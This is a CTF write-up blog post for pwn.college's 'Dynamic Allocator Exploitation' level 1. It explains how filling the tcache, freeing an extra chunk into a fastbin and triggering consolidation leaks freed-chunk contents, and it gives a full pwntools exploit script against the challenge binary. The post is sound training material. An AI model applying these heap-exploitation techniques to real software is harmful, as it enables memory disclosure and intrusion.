Post

(Dynamic Allocator Exploitation) level 1

Posted
By hackeringtrue
1 min read
(Dynamic Allocator Exploitation) level 1

Information

  • category: pwn

Description

Leverage consolidation to obtain the flag.

Write-up

Tcache holds up to 7 freed chunks of a given size.

Do: allocate N chunks of size S, then free() 7 of them to fill tcache.

Then free one more chunk of size S — that one will go to fastbin instead of tcache.

Later, perform the action (in this binary it’s read_flag/a malloc path) that causes consolidation. Now the freed chunk’s address can be returned. * Use puts (or similar) on that returned pointer — it prints whatever was left in the chunk (pointers, strings, etc.), leaking addresses.

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

from pwn import *

elf = context.binary = ELF("/challenge/toddlerheap_level1.1")
global p
p = elf.process()

def malloc(idx,size):
    p.sendline(b"malloc")
    p.sendline(idx)
    p.sendline(size)

def free(idx):
    p.sendline(b"free")
    p.sendline(idx)

def puts(idx):
    p.sendline(b"puts")
    p.sendline(idx)

def read_flag():
    p.sendline(b"read_flag")

def quit():
    p.sendline(b"quit")

def exploit():
    for i in range(8):
        malloc(f"{i}".encode(),b"0")

    for i in range(8):
        free(f"{i}".encode())
    
    read_flag()

    puts(b"7")

    quit()
    
    p.interactive()
    
def main():
    exploit()

if __name__ == "__main__":
    main()
pwn.college, Dynamic-Allocator-Exploitation
pwn.college PIE ASLR heap house-of-force tecache metadata house-of-spirit
This post is licensed under CC BY 4.0 by the author.